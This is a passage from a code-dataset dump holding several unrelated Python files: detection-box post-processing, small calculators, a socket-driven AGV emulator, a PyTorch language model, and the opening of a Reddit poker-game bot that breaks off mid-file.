blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb33ad3ea3a65fcbe419a5cdd37ea445686a3795 | a2548845125656fa47617d34f1b7e00019f5eb74 | /utils/postprocess.py | a6ed9a86b5cc20cee8b1c0138198823ef61d0f6c | [
"BSD-3-Clause"
] | permissive | COSE474-WhereIsMyWaifu/detector | 57f983cd4ed021023cdddd5633c5600afc9108bc | 23c1850899aafa1af35af2a3a3d08ba09272b4b2 | refs/heads/master | 2020-08-30T00:33:56.729047 | 2019-12-23T15:22:56 | 2019-12-23T15:22:56 | 218,216,092 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,418 | py | import numpy as np
import PIL.Image as Image
class PostProcessor(object):
    """Post-processing utilities for detector output.

    Boxes are in center format ``[cx, cy, w, h, confidence]``.  ``prediction``
    dicts carry ``'pred'`` and ``'label'`` arrays whose rows are such boxes.
    """

    def resize(self, from_size, to_size, prediction):
        """Rescale every predicted and ground-truth box from ``from_size`` to
        ``to_size`` (both ``(width, height)``), using the larger axis ratio so
        box aspect ratios are preserved.  Confidence (index 4) is untouched.
        """
        x_rate = to_size[0] / from_size[0]
        y_rate = to_size[1] / from_size[1]
        max_rate = max(x_rate, y_rate)
        scale = [max_rate, max_rate, max_rate, max_rate, 1]
        prediction['pred'] = np.array([pred * scale for pred in prediction['pred']])
        prediction['label'] = np.array([label * scale for label in prediction['label']])
        return prediction

    def iou(self, bbox1, bbox2):
        """Intersection-over-union of two center-format boxes.

        BUGFIX: the original read the width/height of *both* boxes from
        ``bbox1``, so IoU against a differently-sized box was wrong.
        """
        w1, h1 = bbox1[2], bbox1[3]
        w2, h2 = bbox2[2], bbox2[3]
        left1, right1 = bbox1[0] - w1 / 2, bbox1[0] + w1 / 2
        left2, right2 = bbox2[0] - w2 / 2, bbox2[0] + w2 / 2
        top1, bottom1 = bbox1[1] + h1 / 2, bbox1[1] - h1 / 2
        top2, bottom2 = bbox2[1] + h2 / 2, bbox2[1] - h2 / 2
        w_intersect = min(right1, right2) - max(left1, left2)
        h_intersect = min(top1, top2) - max(bottom1, bottom2)
        if h_intersect < 0 or w_intersect < 0:
            return 0  # disjoint boxes
        area1 = w1 * h1
        area2 = w2 * h2
        area_intersect = h_intersect * w_intersect
        # epsilon keeps the division safe for degenerate (zero-area) boxes
        return area_intersect / (area1 + area2 - area_intersect + 1e-9)

    # all bbox above conf_threshold
    def ABOVE(self, prediction, context):
        """Keep only rows whose confidence exceeds ``context['conf_threshold']``."""
        return prediction[np.where(prediction[:, 4] > context['conf_threshold'])]

    # non-maximum suppression
    def NMS(self, prediction, context):
        """Greedy NMS: walk boxes by descending confidence, dropping any box
        whose IoU with an already-kept box exceeds ``context['iou_threshold']``.
        """
        above_thres = prediction[np.where(prediction[:, 4] > context['conf_threshold'])]
        pred_sorted = np.flip(np.argsort(above_thres[:, 4]))
        kept = []
        for p0 in pred_sorted:
            discard = False
            for p1 in kept:
                if self.iou(above_thres[p0], above_thres[p1]) > context['iou_threshold']:
                    discard = True
                    break
            if not discard:
                kept.append(p0)
        return np.array(above_thres[kept])

    # custom 1
    def CUSTOM1(self, prediction, context):
        """Cluster-and-average NMS variant: each box joins the existing group
        whose running mean it overlaps most (if above the IoU threshold),
        otherwise starts a new group; returns the per-group mean boxes.
        """
        above_thres = prediction[np.where(prediction[:, 4] > context['conf_threshold'])]
        pred_sorted = np.flip(np.argsort(above_thres[:, 4]))
        groups = []
        for p0 in pred_sorted:
            best_group = -1
            best_iou = 0
            for g in range(len(groups)):
                iou_match = self.iou(above_thres[p0], np.mean(groups[g], axis=0))
                if iou_match > context['iou_threshold'] and iou_match > best_iou:
                    best_iou = iou_match
                    best_group = g
            if best_group < 0:
                groups.append([above_thres[p0]])
            else:
                groups[best_group].append(above_thres[p0])
        return np.array([np.mean(pred_group, axis=0) for pred_group in groups])

    def CUSTOM2(self, prediction, context):
        """Iteratively merge the top-confidence box with its best overlapping
        partner (confidence-weighted average) until no pair exceeds the IoU
        threshold.  Returns a plain Python list of merged rows.
        """
        above_thres = np.copy(prediction[np.where(prediction[:, 4] > context['conf_threshold'])])
        pred_sorted = above_thres[np.flip(np.argsort(above_thres[:, 4]))]
        # merge with max iou until converge
        pred_result = []
        while len(pred_sorted) > 0:  # BUGFIX: was `len(...) is 0` identity tests
            max_iou = 0
            max_indx = 0
            p0 = pred_sorted[0]
            for p_indx in range(1, len(pred_sorted)):
                iou_match = self.iou(p0, pred_sorted[p_indx])
                if iou_match > context['iou_threshold'] and iou_match > max_iou:
                    max_iou = iou_match
                    max_indx = p_indx
            if max_indx != 0:
                # confidence-weighted average of the head row and its best match
                weight_0 = pred_sorted[0][4]
                weight_1 = pred_sorted[max_indx][4]
                weight_sum = weight_0 + weight_1
                avg = (pred_sorted[0] * weight_0 / weight_sum) + (pred_sorted[max_indx] * weight_1 / weight_sum)
                pred_sorted = np.delete(pred_sorted, max_indx, 0)
                pred_sorted = np.delete(pred_sorted, 0, 0)
                pred_sorted = np.append(pred_sorted, [avg], 0)
            else:
                pred_result.append(p0)
                pred_sorted = np.delete(pred_sorted, 0, 0)
            if len(pred_sorted) > 0:
                # re-sort so the highest-confidence box is always at the head
                pred_sorted = pred_sorted[np.flip(np.argsort(pred_sorted[:, 4]))]
        return pred_result

    def calcAccuracyMap(self, truth, truth_len, pred, context):
        """Match predictions to ground truth and tally detection statistics.

        ``truth_len`` is expected to be a numpy integer scalar (``.item()`` is
        called on it for the report).  Returns counts of true positives,
        false negatives, false positives, and duplicate matches.
        """
        check_arr = np.zeros(truth_len)
        check_fp = 0
        for p in pred:
            max_indx = -1
            max_iou = 0.01  # minimum overlap to consider a match at all
            for i in range(0, truth_len):
                iou_val = self.iou(p, truth[i])
                if max_iou < iou_val:
                    max_iou = iou_val
                    max_indx = i
            if max_indx == -1:  # BUGFIX: was `is -1` identity test
                check_fp = check_fp + 1
            else:
                if max_iou > context['acc_iou_threshold']:
                    check_arr[max_indx] = check_arr[max_indx] + 1
                else:
                    check_fp = check_fp + 1
        result = {}
        result['count'] = truth_len.item()
        result['true positive'] = np.argwhere(check_arr != 0).size
        result['false negative'] = np.argwhere(check_arr == 0).size
        result['false positive'] = check_fp
        result['duplicate'] = np.argwhere(check_arr > 1).size
        return result
| [
"talluay@gmail.com"
] | talluay@gmail.com |
d2a70095853cf66fcee8f1b49317c3ede2a0e2bf | 7e5160f3b278d6197229a05c6682a9bbfb15504b | /Assignment_2/Q20_datetime_file.py | c55bca04995d49e800fadf507b97f62b6d3d6333 | [] | no_license | hitesh2940/Python_practice | 2a135f22aa13f61a087da6eb29ae7827faa995d4 | 7dcec70e43d167d6ff9d63f3e9016328d22d9057 | refs/heads/main | 2023-08-14T22:58:02.074851 | 2021-09-21T10:06:43 | 2021-09-21T10:06:43 | 399,853,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | #Write a python program to read current date and time, delete content of file JD_file.txt and save date time in it.
import datetime

# Read the current date/time, wipe JD_file.txt, and store the timestamp.
# Opening in mode "w" already truncates (or creates) the file, so the
# original's separate open("r+")/seek/truncate pass was redundant — and it
# crashed with FileNotFoundError when the file did not exist yet.  The
# context manager also guarantees the file is closed on any error.
with open("JD_file.txt", "w") as f:
    f.write(str(datetime.datetime.now()))
"noreply@github.com"
] | hitesh2940.noreply@github.com |
80796e8fe36dfaf85f2154db7bc01de0d37ca837 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/411/usersdata/321/79296/submittedfiles/av1_programa2.py | 7523b13236ebbd307d04c1c424ebe8e6ed24a9a4 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | # -*- coding: utf-8 -*-
def final_price(label_price, payment_option):
    """Return the price to charge for *label_price* under *payment_option*.

    Options: 1 -> 15% discount, 2 -> 10% discount, 3 -> list price,
    4 -> 10% surcharge.  Any other option returns None (the original
    script printed nothing for unknown options).
    """
    if payment_option == 1:
        return label_price - (label_price * 15) / 100
    elif payment_option == 2:
        return label_price - (label_price * 10) / 100
    elif payment_option == 3:
        return label_price
    elif payment_option == 4:
        return label_price + (label_price * 10) / 100
    return None


if __name__ == "__main__":
    # Entrada (inputs)
    a = float(input('Preço normal da etiqueta: '))
    b = int(input('Condição de pagamento: '))
    # Saídas (output): formatted to two decimal places, as before
    total = final_price(a, b)
    if total is not None:
        print('%.2f' % total)
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
4d37d3f4430224a7d858060b0224715fd558aa1d | 2fdc95192f1b268990cf97efb7970c1c8be8a657 | /E_AGV_V1/run.py | b425dbe65e0e253bf6bf3ac5ec54c0c70c29cef0 | [] | no_license | arrtvv852/AGV-Emulator | 4c9f98779cf6b88dd13d33d388d05eef5c4b70bd | 44faff07dc5bdbc8784e0ae91598ee128e70ed65 | refs/heads/master | 2020-05-04T17:17:20.654877 | 2019-04-03T14:38:33 | 2019-04-03T14:38:33 | 179,305,395 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,126 | py | # -*- coding: utf-8 -*-
"""
Created on Thu May 3 16:32:10 2018
@author: CIMlab徐孟維
"""
import ShopFloor as SF
import socket as SK
import pickle
import threading as td
import tkinter as tk
import time
def Display(Vehicle):
    """Tkinter status window for one AGV.

    Shows the AGV's current action, target job, and load, refreshed twice a
    second from the shared *Vehicle* object.  Runs forever — intended to be
    started on its own thread.
    """
    time.sleep(1)
    window = tk.Tk()
    window.title("AGV Agent")
    window.geometry("{}x{}".format(1000, 200))
    canvas = tk.Canvas(bg = "white", height = 200, width = 1000)
    canvas.pack()
    # Static labels (blue) and the mutable value fields (red/black).
    canvas.create_text(100, 70, text = "AGV"+str(Vehicle.ID), font = ("arial", 20), fill = "blue")
    canvas.create_text(400, 70, text = "Target job:", font = ("arial", 20), fill = "blue")
    canvas.create_text(700, 70, text = "Load:", font = ("arial", 20), fill = "blue")
    Target = canvas.create_text(500, 70, text = "", font = ("arial", 20), fill = "red")
    Load = canvas.create_text(800, 70, text = "Empty", font = ("arial", 20), fill = "red")
    Disp = canvas.create_text(200, 70, text = "IDLE", font = ("arial", 20), fill = "red")
    disp = canvas.create_text(500, 140, text = "[]", font = ("arial", 15), fill = "black")
    while True:
        # Translate the vehicle's numeric status codes into action names,
        # keeping at most ~10 queued actions for display.
        task = []
        for i in Vehicle.status:
            if len(task) > 10:
                break
            if i == 1:
                task.append("UP")
            elif i == 2:
                task.append("DOWN")
            elif i == 3:
                task.append("LEFT")
            elif i == 4:
                task.append("RIGHT")
            elif i == 5:
                task.append("DROP")
            elif i == 6:
                task.append("PICK")
        canvas.update()
        time.sleep(0.5)
        # Redraw the mutable fields by deleting and recreating the text items.
        canvas.delete(disp)
        canvas.delete(Disp)
        canvas.delete(Target)
        canvas.delete(Load)
        # Goal < 0 means no target job assigned.
        if Vehicle.Goal >= 0:
            target = "Job"+str(Vehicle.Goal)
        else:
            target = ""
        # content == 0 means the AGV is carrying nothing.
        if Vehicle.content != 0:
            load = "Job"+str(Vehicle.content)
        else:
            load = "Empty"
        # Current action is the head of the queue, or IDLE when empty.
        if task == []:
            cur = "IDLE"
        else:
            cur = task.pop(0)
        Disp = canvas.create_text(200, 70, text = cur, font = ("arial", 20), fill = "red")
        Target = canvas.create_text(500, 70, text = target, font = ("arial", 20), fill = "red")
        Load = canvas.create_text(800, 70, text = load, font = ("arial", 20), fill = "red")
        disp = canvas.create_text(500, 140, text = str(task), font = ("arial", 15), fill = "black")
def Connect_Center(Vehicle, center, s):
    """Register this AGV with the control center and service its commands.

    *center* is the already-connected control-center socket; *s* is the
    environment socket, forwarded to Center_Resolve.  Runs forever —
    intended to be started on its own thread.
    """
    # Handshake: print the greeting, identify ourselves as an AGV, then wait
    # until Connect_Env has filled in our vehicle ID before reporting it.
    print(center.recv(1000).decode())
    center.send("AGV".encode())
    while Vehicle.ID == 0:
        True  # busy-wait (spin) until the environment thread assigns an ID
    msg = pickle.dumps([Vehicle.ID, Vehicle.Electricity])
    center.send(msg)
    # Command loop: each pickled message looks like [sender, type, args...].
    while True:
        msg = pickle.loads(center.recv(1024))
        print("Center:", msg[1])
        Type = msg[1]
        if Type == "New":
            Vehicle.Center_New(msg[2], msg[3], msg[4])
        elif Type == "S_New":
            Vehicle.Center_S_New(msg[2])
        elif Type == "Park":
            Vehicle.Center_Park()
        elif Type == "Resolve":
            Vehicle.Center_Resolve(msg[2], s)
        elif Type == "StartIdle":
            Vehicle.Center_StartIdle()
def Connect_Env(Vehicle, s):
    """Handshake with the environment server over socket *s*, then dispatch
    FMS commands to *Vehicle* forever.  Intended to run on its own thread.
    """
    # Handshake: print greeting, identify as an AGV, then receive our
    # assigned vehicle ID and starting battery level.
    print(s.recv(1000).decode())
    s.send("AGV".encode())
    ident = pickle.loads(s.recv(1024))
    Vehicle.ID = ident[0]
    Vehicle.Electricity = ident[1]
    # Command name -> action.  Some actions need the socket; "Block" carries
    # an extra payload in the message.
    dispatch = {
        "Idle": lambda m: Vehicle.FMS_Idle(),
        "Charge": lambda m: Vehicle.FMS_Charge(),
        "Pick": lambda m: Vehicle.FMS_Pick(s),
        "Drop": lambda m: Vehicle.FMS_Drop(),
        "Move": lambda m: Vehicle.FMS_Move(),
        "Block": lambda m: Vehicle.FMS_Block(m[2]),
        "Task": lambda m: Vehicle.FMS_Task(s),
        "LowPower": lambda m: Vehicle.FMS_LowPower(),
        "Start": lambda m: Vehicle.FMS_Start(s),
    }
    # Command loop: each pickled message is [vehicle_id, type, args...].
    # Only messages addressed to us with a recognized type are acted on.
    while True:
        msg = pickle.loads(s.recv(1024))
        print(msg)
        if msg[0] == Vehicle.ID and msg[1] in dispatch:
            dispatch[msg[1]](msg)
if __name__ == "__main__":
    # Shared vehicle state, mutated by all three threads below.
    Vehicle = SF.Vehicle(0, 0, 0)
    # Control-center connection (commands like New/Park/Resolve).
    center = SK.socket(SK.AF_INET, SK.SOCK_STREAM)
    host = "192.168.0.2"
    port = 1001
    center.connect((host, port))
    Vehicle.connect = center
    # Environment (shop floor) connection (FMS_* commands).
    s = SK.socket(SK.AF_INET, SK.SOCK_STREAM)
    host = "192.168.0.3"
    port = 1000
    s.connect((host, port))
    # One thread per concern: environment protocol, center protocol, GUI.
    P1 = td.Thread(target = Connect_Env, args = (Vehicle, s))
    P2 = td.Thread(target = Connect_Center, args = (Vehicle, center, s))
    P3 = td.Thread(target = Display, args = (Vehicle, ))
    P1.start()
    P2.start()
    P3.start()
    # All three loops run forever, so these joins block indefinitely.
    P1.join()
    P2.join()
    P3.join()
"noreply@github.com"
] | arrtvv852.noreply@github.com |
c99fc98cb19087ac23f06bd2e4062101e9c970b7 | 76ddef791495e09b66e701816d03f2f86aca73d4 | /words.py | f3ec182ec8fcba0ef5fb4c04699deb8d415ea0ad | [] | no_license | kragen/spellmell | 8e1511bdcd69cd0c28e3cbbcf5dd67f49485b85f | f5452e787489f3320b312c80a64cd8b5554cec3e | refs/heads/master | 2021-01-16T00:35:40.105761 | 2008-12-11T02:01:36 | 2008-12-11T02:01:36 | 88,409 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | import re
import sys
def words(text):
    """Lower-case *text* and return the list of tokens (runs of letters and
    apostrophes), each stripped of surrounding quote characters.

    A list comprehension replaces the original ``map`` call: under Python 2
    ``map`` returned a list, but under Python 3 it would be a lazy iterator,
    so the comprehension keeps the returned type a list on both.
    """
    return [stripquote(token) for token in re.findall(r"[a-z']+", text.lower())]
def stripquote(s):
    """Trim leading/trailing apostrophes, keeping interior ones ("don't")."""
    trimmed = s.strip("'")
    return trimmed
# Tokenize stdin line by line and emit one word per output line.
# print(word) with a single argument is valid in both Python 2 and
# Python 3, unlike the original's Python-2-only `print word` statement.
for line in sys.stdin:
    for word in words(line):
        print(word)
| [
"darius@static.unknown.charter.com"
] | darius@static.unknown.charter.com |
a26b70f1e1d51b49d484ae8516312583af8cba38 | 9079354291951a1782ec43efaead5876895eece8 | /sent_to_vec/masked_lm/pervasive_model.py | bb2efc8c00655a488446593750ed5ca65dab961b | [] | no_license | luungoc2005/nlp-test | c9a2e0174546221b0e6d2501d9c4dfeca5c6efd0 | ed43a4b1bbcd23c3fc39e92d790864c73a5999f3 | refs/heads/master | 2022-12-08T14:17:07.271865 | 2019-05-26T16:23:20 | 2019-05-26T16:23:20 | 125,201,975 | 0 | 0 | null | 2022-12-07T23:37:52 | 2018-03-14T11:24:54 | Jupyter Notebook | UTF-8 | Python | false | false | 5,854 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
from config import LM_VOCAB_SIZE, LM_HIDDEN_DIM, LM_SEQ_LEN, LM_CHAR_SEQ_LEN, START_TAG, STOP_TAG, UNK_TAG, MASK_TAG
from common.modules import LockedDropout, WeightDrop
from common.splitcross import SplitCrossEntropyLoss
from common.wrappers import IModel
from common.torch_utils import to_gpu
from featurizers.basic_featurizer import BasicFeaturizer
from common.splitcross import SplitCrossEntropyLoss
from sent_to_vec.masked_lm.densenet import DenseNet
from sent_to_vec.masked_lm.aggregator import Aggregator
from typing import Union, Iterable, Tuple
class PervasiveAttnLanguageModel(nn.Module):
    """Pervasive-attention style language model.

    Embeds the input sequence, builds a 2-D (source x target) grid of
    concatenated embeddings, runs it through a DenseNet, aggregates over the
    source axis, and projects back to vocabulary logits.  Optionally ties the
    decoder weights to the input embedding matrix.
    """
    def __init__(self, config):
        super(PervasiveAttnLanguageModel, self).__init__()
        self.config = config
        # Hyper-parameters, with project-level defaults as fallbacks.
        self.tie_weights = config.get('tie_weights', True)
        self.embedding_dim = config.get('embedding_dim', LM_HIDDEN_DIM)
        self.dropout_emb = config.get('emb_dropout', .2)
        self.dropout_net = config.get('net_dropout', .2)
        self.num_words = config.get('num_words', LM_VOCAB_SIZE)
        self.n_layers = config.get('n_layers', 6)
        self.use_adasoft = config.get('use_adasoft', True)
        self.adasoft_cutoffs = config.get('adasoft_cutoffs', [LM_VOCAB_SIZE // 2, LM_VOCAB_SIZE // 2])
        # Token embedding; also reused as the decoder weight when tying.
        self.encoder = nn.Embedding(
            self.num_words, self.embedding_dim
        )
        # The grid concatenates source and target embeddings channel-wise.
        self.input_channels = self.embedding_dim * 2
        self.net = DenseNet(
            self.input_channels,
            {
                'growth_rate': 32,
                'num_layers': [20],
                'kernels': [3],
                'divde_channels': 2,
                'normalize_channels': 0,
                'dilation': 1,
                'groups': 1,
                'layer_type': 'regular',
                'transition_type': 1,
                'bias': 0,
                'gated': 0,
                'weight_norm': 0,
                'init_weights': 0,
                'conv_dropout': self.dropout_net,
                'efficient': 1
            }
        )
        # NOTE(review): self.hidden_dim is never assigned anywhere in this
        # class, so tie_weights=False would raise AttributeError below —
        # confirm intended behavior.
        self.aggregator = Aggregator(
            self.net.output_channels,
            self.embedding_dim if self.tie_weights else self.hidden_dim,
            {
                'mode': 'max',
                'first_aggregator': 'max',
                'attention_dropout': .2,
                'scale_ctx': 1,
                'nonlin': 'none',
                'mapping': 'linear',
                'map_embeddings': 'none'
            }
        )
        self.decoder = nn.Linear(
            self.embedding_dim if self.tie_weights else self.hidden_dim,
            self.num_words
        )
        self.adasoft = None
        # Weight tying
        if self.tie_weights:
            self.decoder.weight = self.encoder.weight
        self.init_weights()

    def init_weights(self):
        # Uniform init for the embedding/decoder, zero bias (common LM setup).
        init_range = 0.1
        self.encoder.weight.data.uniform_(-init_range, init_range)
        self.decoder.bias.data.zero_()
        self.decoder.weight.data.uniform_(-init_range, init_range)

    def merge(self, src_emb, trg_emb):
        # Channel-wise concatenation of the two 4-D embedding grids.
        return torch.cat((src_emb, trg_emb), dim=3)

    def _expand(self, tensor, dim, reps):
        # Expand 4D tensor in the source or the target dimension
        if dim == 1:
            return tensor.repeat(1, reps, 1, 1)
            # return tensor.expand(-1, reps, -1, -1)
        if dim == 2:
            return tensor.repeat(1, 1, reps, 1)
            # return tensor.expand(-1, -1, reps, -1)
        else:
            raise NotImplementedError

    def _forward(self, X, src_lengths=None, track=False):
        # Move channels first for the conv net, run DenseNet, then aggregate
        # over the source axis (optionally returning attention for tracking).
        X = X.permute(0, 3, 1, 2)
        X = self.net(X)
        if track:
            X, attn = self.aggregator(X, src_lengths, track=True)
            return X, attn
        X = self.aggregator(X, src_lengths, track=track)
        return X

    def forward(self,
                x_input: Union[torch.LongTensor, torch.cuda.LongTensor],
                hidden: Union[torch.FloatTensor, torch.cuda.FloatTensor] = None,
                training: bool = False) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
        """Compute vocabulary logits for *x_input*.

        *hidden* is accepted for interface compatibility but unused; the
        extra None return values likewise keep the RNN-style signature.
        """
        training = training or self.training
        src_emb = self.encoder(x_input).permute(1, 0, 2)
        # Source doubles as the target sequence (masked-LM style self-grid).
        trg_emb = src_emb.clone()
        # trg_emb = self.trg_embedding(data_trg)
        Ts = src_emb.size(1) # source sequence length
        # Tt = trg_emb.size(1) # target sequence length
        # 2d grid:
        # src_emb = self._expand(src_emb.unsqueeze(1), 1, Tt)
        # trg_emb = self._expand(trg_emb.unsqueeze(2), 2, Ts)
        src_emb = self._expand(src_emb.unsqueeze(1), 1, Ts)
        trg_emb = self._expand(trg_emb.unsqueeze(2), 2, Ts)
        X = self.merge(src_emb, trg_emb)
        # del src_emb, trg_emb
        # X = self._forward(X, data_src['lengths'])
        X = self._forward(X, None)
        logits = self.decoder(X).permute(1, 0, 2)
        # return logits
        return logits, None, None, None
class PervasiveAttnLanguageModelWrapper(IModel):
    """IModel wrapper binding PervasiveAttnLanguageModel to a BasicFeaturizer
    configured with the masked-LM reserved tokens.
    """

    def __init__(self, config=None, *args, **kwargs):
        # BUGFIX: the original signature was ``config=dict()`` — a mutable
        # default created once at definition time and then mutated below, so
        # featurizer settings leaked between instances constructed without an
        # explicit config.  ``None`` sentinel preserves the old behavior for
        # all explicit callers.
        if config is None:
            config = dict()
        # The same dict is deliberately shared with the featurizer and stored
        # on self, matching the original data flow.
        featurizer_config = config
        featurizer_config['append_sos_eos'] = True
        featurizer_config['featurizer_reserved_tokens'] = [START_TAG, STOP_TAG, UNK_TAG, MASK_TAG]
        super(PervasiveAttnLanguageModelWrapper, self).__init__(
            model_class=PervasiveAttnLanguageModel,
            config=config,
            featurizer=BasicFeaturizer(featurizer_config),
            *args, **kwargs
        )
        self.seq_len = config.get('seq_len', LM_SEQ_LEN)
        self.config = config

    def on_model_init(self):
        # Hook called by IModel after the model instance exists.
        model = self._model

    # def repackage_hidden(self, h) -> Union[torch.Tensor, Tuple]:
    #     if torch.is_tensor(h):
    #         return to_gpu(h.detach())
    #     else:
    #         return tuple(self.repackage_hidden(v) for v in h)
| [
"luungoc2005@gmail.com"
] | luungoc2005@gmail.com |
d8e1ab0778a17030a2ee03eccba776743384747f | c05577170c952fcac1e832259289a3ad37fbef91 | /group 6 project new.py | c5676068369e458519621f9d771769f7cdf5aac7 | [] | no_license | Bolodeoku1/PET328_2021_Class | b005bfd9c54c9293fb1bfe676a6ed4cf8df6ceae | 58e16e7e10a6b6727bc4e965f4801be8a6b15393 | refs/heads/main | 2023-07-03T06:43:56.010665 | 2021-08-09T21:28:00 | 2021-08-09T21:28:00 | 381,508,480 | 0 | 0 | null | 2021-06-29T22:07:00 | 2021-06-29T22:06:59 | null | UTF-8 | Python | false | false | 503 | py | B_comp = float (input('What is the bit cost?'))
CR_comp = float (input('What is the rig cost per hour?'))
t_comp = float (input('What is the drilling time?'))
T_comp = float (input('What is the round trip time?'))
F_comp = float (input('What is the footage drill per bit?'))
# convert inputs to numerals
# the formula for drilling cost per foot
drilling_cost_per_foot =(B_comp + CR_comp * (t_comp + T_comp))/(F_comp)
print('The drilling cost per foot is {0:.2f} $' .format (drilling_cost_per_foot))
| [
"adewale.bolodeoku@stu.cu.edu.ng"
] | adewale.bolodeoku@stu.cu.edu.ng |
3667b52e372a2dccb9a702ddf3b9a2920f3cc1d3 | adc148caac17c04434e405aff0dcb1839a5b15b1 | /v2/poker_handler.py | eabee06ac30aa23dadedceb459e45f38b6db8469 | [] | no_license | Sophie-Williams/SolutionGambling | 9dca9f2a28d3de9bcc79fd652e0756bbf0935e7e | 4ed17002e2bf4916ab13f4938832220ecdaaa8e6 | refs/heads/master | 2020-05-19T15:32:22.060495 | 2017-08-02T04:03:30 | 2017-08-02T04:03:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,036 | py | import json
import traceback
import time
import deuces
import pika
import praw
import SG_Repository
import SG_Messages
import ConfigParser
import SG_Utils
# --- configuration ---------------------------------------------------------
# All tunables live in settings.config: [General] holds bot-wide values,
# and the section named by config_header holds this game's bet limit.
config = ConfigParser.ConfigParser()
config.read("settings.config")
config_header = "Poker"
username = config.get("General", "username")
version = config.get("General", "version")
starting_balance = int(config.get("General", "starting_balance"))
max_bet = int(config.get(config_header, "bet_limit"))

# Payout multipliers keyed by deuces hand-rank class.  Key 0 is used for the
# special-cased royal flush (hand_score == 1); 1 = straight flush down to
# 9 = high card.  Classes 8 and 9 pay nothing.
payout_table = {
    0 : 45000,
    1 : 4000,
    2 : 600,
    3 : 55,
    4 : 25,
    5 : 10,
    6 : 5,
    7 : 2,
    8 : 0,
    9 : 0
}
game_type = 'High-hand Poker'
logger_name = 'poker_handler'
def format_wager_reply(username, wager_amount, hand_string, board_string, hand_type, outcome,
                       winnings, new_balance):
    # Render the dealer's reply comment from the success template.
    # NOTE(review): ``outcome`` is accepted but never interpolated into the
    # template — confirm whether the template is meant to display it.
    return reply_messages.POKER_SUCCESS_MSG.format(username,
                                                   wager_amount,
                                                   hand_string,
                                                   board_string,
                                                   hand_type,
                                                   winnings,
                                                   new_balance)
def send_royal_message(comment_id):
    # Ping the maintainer via Reddit PM whenever someone hits a royal flush,
    # linking the triggering comment ID.
    reddit.redditor('eganwall').message('ROYAL FLUSH BABY', 'SOMEONE HIT A ROYAL! Look here : {}'.format(str(comment_id)))
def deal_hand():
    """Draw from a freshly shuffled deck: a 5-card board first, then a
    2-card hand, returned as {'board': ..., 'hand': ...}."""
    fresh_deck = deuces.Deck()
    community = fresh_deck.draw(5)
    hole_cards = fresh_deck.draw(2)
    return {'board': community, 'hand': hole_cards}
def parse_post_for_wager(post_body, player_balance):
    """Extract a wager amount from a comment body of the form 'wager <n>' or
    'wager max'.

    Returns 0 for anything unparseable or non-positive.  'max' wagers are
    capped at both the player's balance and the table limit (max_bet).
    """
    body_tokens = post_body.strip().split(' ')
    if len(body_tokens) > 1 and body_tokens[0] == 'wager':
        if body_tokens[1] == 'max':
            return min(player_balance, max_bet)
        # BUGFIX: the original gated on isnumeric(), which accepts characters
        # such as u'\u00b2' that int() cannot parse, crashing the handler
        # with an uncaught ValueError.  Parse defensively instead.
        try:
            amount = int(body_tokens[1])
        except ValueError:
            return 0
        # isnumeric() never matched a leading '-', so negatives stayed 0.
        return amount if amount > 0 else 0
    return 0
def play_poker(wager_amount, comment_id):
    """Deal one hand, score it with the deuces evaluator, and compute the
    payout for *wager_amount*.  Returns a dict with the hand type, pretty
    card strings, WIN/LOSE outcome, and winnings."""
    player_hand = deal_hand()
    # deuces: lower hand_score is better; rank class 1 (straight flush)
    # through 9 (high card).
    hand_score = evaluator.evaluate(cards=player_hand['hand'], board=player_hand['board'])
    hand_class = evaluator.get_rank_class(hand_score)
    hand_class_string = evaluator.class_to_string(hand_class)
    #print("Player hand class : [raw = {}] [string = {}]".format(hand_class, hand_class_string))
    # if we don't have at least 2 pair, we lose
    if(hand_class > 7):
        outcome = SG_Repository.WagerOutcome.LOSE
        winnings = wager_amount * payout_table[hand_class]  # classes 8/9 pay 0
    # if they hit a royal flush, pay out the special case big payday
    elif (hand_score == 1):
        outcome = SG_Repository.WagerOutcome.WIN
        winnings = wager_amount * payout_table[0]
        send_royal_message(comment_id)
    else:
        outcome = SG_Repository.WagerOutcome.WIN
        winnings = wager_amount * payout_table[hand_class]
    # build the pretty-printed cards into a string for the dealer reply comment
    full_hand_string = """"""
    for current_card in player_hand['hand']:
        full_hand_string += card.int_to_pretty_str(current_card) + """
"""
    full_board_string = """"""
    for current_card in player_hand['board']:
        full_board_string += card.int_to_pretty_str(current_card) + """
"""
    wager_result = {'hand_type' : hand_class_string, 'full_hand_string' : full_hand_string, 'outcome' : outcome,
                    'winnings' : winnings, 'full_board_string' : full_board_string}
    return wager_result
# create our Reddit instance
# Credentials for this game's bot account come from the [Poker] section.
c_id = config.get(config_header, "client_id")
c_secret = config.get(config_header, "client_secret")
user = config.get(config_header, "plain_username")
pw = config.get(config_header, "password")
reddit = praw.Reddit(
    client_id = c_id,
    client_secret = c_secret,
    username = user,
    password = pw,
